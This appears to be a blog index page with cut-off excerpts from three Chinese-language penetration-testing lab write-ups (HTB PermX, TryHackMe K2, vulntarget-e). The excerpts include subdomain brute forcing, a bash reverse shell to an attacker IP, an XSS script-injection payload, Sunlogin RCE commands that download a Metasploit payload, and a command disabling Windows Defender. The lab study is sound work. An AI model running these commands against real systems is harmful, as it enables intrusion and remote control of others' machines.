HTB-PermX
PermX涉及到提权的一个靶机,sudo提权 首先扫一下端口 开放了80以及22端口 打开网页发下自动变成了一个域名 使用ffuf对子域名进行爆破 1ffuf -w D:\tools\DICT\PasswordDic\域名字典\subnames-9.5w.txt -u http://10.129.89.88 -H "Host: FUZZ.permx.htb" -mc 200 把子域名加入到hosts文件中,访问子域名网站 存在CVE-2023-4220 insomnia-jacob/CVE-2023-4220:CVE-2023-4220 POC RCE 反弹个shell回来 1bash -c "/bin/sh -i >& /dev/tcp/10.10.14.7/9999 0>&1" 存在python3 我们启一个交互式shell 1python3 -c "import...
tryhackme-k2 Writeup
Base Camp首先进行端口扫描和目录扫描对k2.thm 是个静态页面也没啥关键信息 试着爆破子域名,使用fuff 1ffuf -w D:\tools\DICT\PasswordDic\域名字典\subnames-9.5w.txt -u http://k2.thm/ -H "HOST:FUZZ.k2.thm" -fw 811 接着对域名和ip绑定 访问两个页面 前面内容大差不差 admin登录不进去 我们先注册个用户普通用户进去 进去之后是个文本框 抓包测试一下看眼参数,先简单测试一下sql注入好像没有 接着测试xss,在本地先启一个python服务 1python -m http.server 80 插入xss语句 12<script src="http://10.11.112.0/test"></script><script...
vulntarget-e
vulntarget-e 打靶1.外网靶机(win2016)端口扫描,49773端口存在向日葵服务 扫描是否存在向日葵rce https://github.com/Mr-xn/sunlogin_rce 尝试执行命令 1sunRce.exe -t rce -p 49773 -h 192.168.237.139 -c "whoami" 生成msf木马 python开启http服务下载木马 有windows Defender(关闭) 关闭防火墙 1234python -m http.server 80sunRce.exe -t rce -p 49773 -h 192.168.237.139 -c "curl -o c://bb.exe http://192.168.237.129/bind.exe"sunRce.exe -t rce -p 49773 -h 192.168.237.139 -c "set-MpPreference -DisableRealtimeMonitoring...